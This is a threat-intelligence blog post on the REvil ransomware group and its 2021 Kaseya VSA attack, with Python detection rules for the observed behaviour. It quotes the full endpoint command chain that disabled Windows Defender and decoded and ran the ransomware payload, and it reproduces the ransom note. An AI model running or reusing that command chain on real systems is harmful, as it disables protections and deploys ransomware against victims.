The REvil is in the details

Ransomware | Kristóf Arleitner | November 2, 2021

Background

The REvil (also known as Sodinokibi) ransomware operation has taken the spotlight in recent years. The Russian group operates by direct attacks, and also in a ransomware-as-a-service (RaaS) model, through affiliates who provide access to networks, carry out ransomware attacks or negotiate on behalf of REvil.

In the RaaS model, affiliates keep about 70% of profits, with the remaining 30% going to the RaaS operator in exchange for customizable ransomware software, documentation or a support community. Sometimes RaaS even features full-fledged portals that let affiliates track their infected victim systems, chat with victims to handle negotiations, and deal with payments.

REvil is said to have scammed some of its own affiliates out of their 70% cut, by hijacking affiliates’ negotiation chat sessions with the victims, and using a backdoor in the ransomware code for decrypting files.

Some of REvil’s notable attacks:

  • 2020 May: Based on data stolen from a New York law firm, they went as far as trying to extort then U.S. President Donald Trump for $42 million.
  • 2021 March: Downloaded data and installed ransomware on Acer‘s internal systems, demanding $50 million for decrypting files and not leaking the data.
  • 2021 April: REvil stole plans of upcoming Apple laptops and a new Apple Watch, information that proved to be accurate. They demanded $50 million for not releasing the documents publicly.
  • 2021 May: U.S. meatpacker JBS was forced to shut down production and eventually paid an $11 million ransom.
  • 2021 June: Major Brazilian healthcare provider Grupo Fleury was hit by a ransomware attack, leaving patients unable to book appointments online, with a $5 million ransom demand.
  • 2021 July 2: Hundreds of MSPs were infected with REvil ransomware through Kaseya’s VSA IT management solution. This in turn caused infections and downtime for clients of those MSPs, up to 1500 companies. Swedish grocery store chain Coop was one of the victims. It couldn’t operate cash registers, and as a consequence closed all 800 of its stores for several days.
  • 2021 July 7: REvil hacked HX5, a Florida-based defense contractor, which has the U.S. Army, the Navy, the Air Force and NASA among its clients, releasing some of the leaked documents on their dark web page, the Happy Blog.

Let’s look at the techniques REvil used in the Kaseya VSA ransomware attack in 2021 July.

Kaseya VSA ransomware attack

Kaseya VSA is an IT management software that helps deal with a large number of computers remotely, with features like patch management, monitoring or device inventory. It communicates with agent software running on endpoints.

[Image: Kaseya VSA dashboard]

Initial foothold on multiple Kaseya VSA on-prem servers run by MSPs was established using an authentication bypass vulnerability (CVE-2021-30116) in the web interface of VSA. The software also had a number of SQL injection vulnerabilities, and one of these was confirmed as the first code execution step.

After gaining command execution on VSA servers, ransomware was deployed to endpoints by creating a procedure in VSA called “Kaseya VSA Agent Hot-fix”:

[Image: VSA procedure used to push ransomware to endpoints (Huntress)]

The “Kaseya VSA Agent Hot-fix” procedure dropped a base64 encoded executable named agent.crt on endpoints, and executed the following command chain:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

The chain first delays execution (the ping of 127.0.0.1 with a large repeat count acts as a sleep), then uses Set-MpPreference to disable Windows Defender features such as real-time protection and the scanning of downloaded files and attachments. Then a copy of the Windows certutil.exe tool is made.

While certutil is in itself a legitimate application, it is abused in living-off-the-land attacks so often that some security solutions alert on direct executions of it. Copying it to C:\Windows\cert.exe could be a way to circumvent those protections.

For added obfuscation, some random bytes are appended to the copied cert.exe, possibly to avoid hash-based detection: echo %RANDOM% >> C:\Windows\cert.exe

Finally, the agent.crt payload is base64 decoded: C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe, and the decoded file is executed: c:\kworking\agent.exe
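The command chain above can be turned into detection logic. The following is an added example (not code from the original post or from Kaseya) that runs a few command-line rules over constructed process-creation records shaped like Sysmon Event ID 1, flagging the ping-based sleep, the Set-MpPreference tampering, the renamed certutil copy, the hash-changing append, and the base64 decode that yields an executable:

```python
import re

# Constructed sample process-creation records in the shape of Sysmon Event ID 1
# (image + command line); these are illustrative, not real captured telemetry.
SAMPLE_EVENTS = [
    {"id": "chain", "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r'cmd.exe /c ping 127.0.0.1 -n 4979 > nul & powershell.exe '
                r'Set-MpPreference -DisableRealtimeMonitoring $true -MAPSReporting Disabled -Force & '
                r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
                r'echo %RANDOM% >> C:\Windows\cert.exe & '
                r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe'},
    {"id": "benign-verify", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\temp\server.cer"},
    {"id": "benign-ping", "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r"cmd.exe /c ping 127.0.0.1 -n 2 > nul"},
]

# Each rule maps a finding name to a pattern over the command line.
RULES = {
    # ping to localhost with a large count is a sleep without calling sleep/timeout
    "ping-sleep": re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+(?:[1-9]\d{2,})\b", re.I),
    # Set-MpPreference used to switch Defender protections off
    "defender-tamper": re.compile(
        r"Set-MpPreference\b.*?-(?:Disable\w+\s+\$true|MAPSReporting\s+Disabled"
        r"|SubmitSamplesConsent\s+NeverSend)", re.I),
    # certutil copied under another name; the copy escapes name-based certutil alerts
    "certutil-renamed-copy": re.compile(
        r"\bcopy\b[^&]*?\\certutil\.exe\s+(?!\S*certutil\.exe)\S+", re.I),
    # appending bytes to a copied binary changes its hash without breaking it
    "append-to-exe": re.compile(r">>\s*\S+\.exe\b", re.I),
    # -decode producing a .exe: a base64 payload being turned into a binary
    "decode-to-exe": re.compile(r"(?:^|\s)-decode\s+\S+\s+\S+\.exe\b", re.I),
}

def classify_event(event):
    """Return the sorted list of finding names that fire on one event."""
    cmd = event["cmdline"]
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))

def scan(events):
    """Map each event id to its findings; an empty list means nothing fired."""
    return {e["id"]: classify_event(e) for e in events}

if __name__ == "__main__":
    for event_id, findings in scan(SAMPLE_EVENTS).items():
        print(f"{event_id}: {findings or 'no findings'}")
```

Any single rule firing on its own is weak evidence; the value is in several of them firing within one command line or one process tree, as they do for the chain above.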

agent.exe has two files packed in it, MsMpEng.exe and mpsvc.dll. The former is a legit, validly signed version of a core Microsoft Defender executable, but it’s an older version from March 2014.

[Image: Legit old MsMpEng.exe (McAfee)]

mpsvc.dll contains the REvil/Sodinokibi ransomware encryptor payload; this file carries a valid signature too.

[Image: Signed malicious mpsvc.dll (Huntress)]

These two files are normally found in C:\Program Files\Windows Defender\, but the malicious versions are placed in the C:\Windows\ directory. agent.exe executes MsMpEng.exe, which loads the malicious mpsvc.dll placed next to it. This DLL sideloading technique, with similar payloads, was observed as early as 2019.
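A valid Authenticode signature says who built a file, not where it belongs, so a location check catches this sideload even though both files are signed. The following is an added example (not code from the original post) that evaluates constructed image-load records shaped like Sysmon Event ID 7 against the expected Defender directory named above:

```python
# Expected location of the Defender engine binaries named in the post; the
# attack placed signed copies of both directly in C:\Windows\ instead.
EXPECTED_DIR = r"c:\program files\windows defender"
DEFENDER_FILES = {"msmpeng.exe", "mpsvc.dll"}

# Constructed sample image-load records in the shape of Sysmon Event ID 7
# (process image and the module it loaded); illustrative, not real telemetry.
SAMPLE_LOADS = [
    {"id": "sideload", "image": r"C:\Windows\MsMpEng.exe",
     "module": r"C:\Windows\mpsvc.dll"},
    {"id": "normal", "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "module": r"C:\Program Files\Windows Defender\mpsvc.dll"},
    {"id": "unrelated", "image": r"C:\Windows\System32\svchost.exe",
     "module": r"C:\Windows\System32\ntdll.dll"},
]

def split_path(path):
    """Return (directory, filename), both lower-cased, for a Windows path."""
    path = path.replace("/", "\\").lower()
    directory, _, name = path.rpartition("\\")
    return directory, name

def check_image_load(event):
    """Return findings for one image-load record (empty list = nothing odd)."""
    findings = []
    img_dir, img_name = split_path(event["image"])
    mod_dir, mod_name = split_path(event["module"])
    # Signature validity is deliberately not consulted: a signed Defender
    # binary outside its home directory is exactly the case to flag.
    for role, d, n in (("image", img_dir, img_name), ("module", mod_dir, mod_name)):
        if n in DEFENDER_FILES and d != EXPECTED_DIR:
            findings.append(f"{role}:{n}:outside-defender-dir")
    # The sideloading pattern itself: the relocated host executable picking up
    # the same-named DLL from its own, non-standard directory.
    if (img_name == "msmpeng.exe" and mod_name == "mpsvc.dll"
            and img_dir == mod_dir and img_dir != EXPECTED_DIR):
        findings.append("sideload-pair")
    return findings

def scan_loads(events):
    """Map each record id to its findings."""
    return {e["id"]: check_image_load(e) for e in events}

if __name__ == "__main__":
    for load_id, findings in scan_loads(SAMPLE_LOADS).items():
        print(f"{load_id}: {findings or 'no findings'}")
```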

The ransomware payload contains a JSON configuration encrypted with RC4 and a static key; an example configuration can be found here: https://gist.github.com/fwosar/a63e1249bfccb8395b961d3d780c0354

[Image: Ransomware JSON config]

This ransom note was dropped on victim systems with the filename {EXT}-readme.txt, e.g. rec953d-readme.txt:

---=== Welcome. Again. ===---
[-] Whats HapPen? [-]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
    [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: hxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion/{UID}
    If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: hxxp://decoder[.]re/{UID}
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
{KEY}

Some variables in the ransom note above are substituted at runtime:

  • {EXT} is the randomly generated file extension appended to encrypted files
  • {UID} is the unique identifier of the victim, based on the system volume serial number and CPUID
  • {KEY} contains base64 encoded statistics of the victim system, such as system language, CPU architecture, operating system information, the workgroup name and hostname

It also displayed this text on the desktop wallpaper:

All of your files are encrypted!
Find {EXT}-readme.txt and follow instuctions

[Image: Ransom note and altered wallpaper]

The ransomware was coded to skip systems from these post-Soviet states, based on the default system language: Russia, Ukraine, Uzbekistan, Kazakhstan, Syria, Azerbaijan, Belarus, Tajikistan, Kyrgyzstan, Turkmenistan, Moldova, Georgia, Armenia.

[Image: Instructions on the website]

Kaseya asked their customers to shut down their on-prem VSA instances to prevent further compromise, and Kaseya shut down all of their own SaaS VSA instances as well.

The REvil group took credit through their Happy Blog page, asking for $70 million to release the master encryption key that would unlock all of the encrypted files of the over 1000 companies affected, but companies could negotiate independently as well. They later lowered the ransom demand to $50 million, but it still wasn’t paid.

[Image: REvil taking credit for the Kaseya VSA attack on their dark web page Happy Blog]

On 2021 September 16, Bitdefender in collaboration with law enforcement released a universal decryptor tool, which can be used to recover from REvil ransomware attacks made before 2021 July 13: https://www.bitdefender.com/blog/labs/bitdefender-offers-free-universal-decryptor-for-revil-sodinokibi-ransomware/

REvil’s disappearance

Days after the Kaseya attack and HX5 defense contractor’s hack by REvil, on 2021 July 9, U.S. President Joe Biden stated after a phone call with Russian President Vladimir Putin:

“I made it very clear to him that the United States expects when a ransomware operation is coming from his soil even though it’s not sponsored by the state, we expect them to act if we give them enough information to act on who that is.”

A senior official said that they expected results soon:

“We’re not going to telegraph what those actions will be precisely – some of them will be manifest and visible, some of them may not be – but we expect those to take place, you know, in the days and weeks ahead”

By July 13 REvil’s dark web and other websites and infrastructure were shut down.

[Image: REvil’s Happy Blog offline]

It’s unclear whether this was caused by law enforcement or done preemptively by REvil. The website briefly came back online again, but has been offline since October.

On 2021 October 21, Tom Kellermann, an adviser to the U.S. Secret Service on cybercrime investigations, stated:

“The FBI, in conjunction with Cyber Command, the Secret Service and like-minded countries, have truly engaged in significant disruptive actions against these groups.”
“REvil was top of the list.”

An REvil operator said on an underground forum that REvil’s servers were hacked, and also:

“The server was compromised, and they were looking for me.”
“Good luck, everyone; I’m off.”

It was after this attack that the FBI released the master decryption key.

Written by: Kristóf Arleitner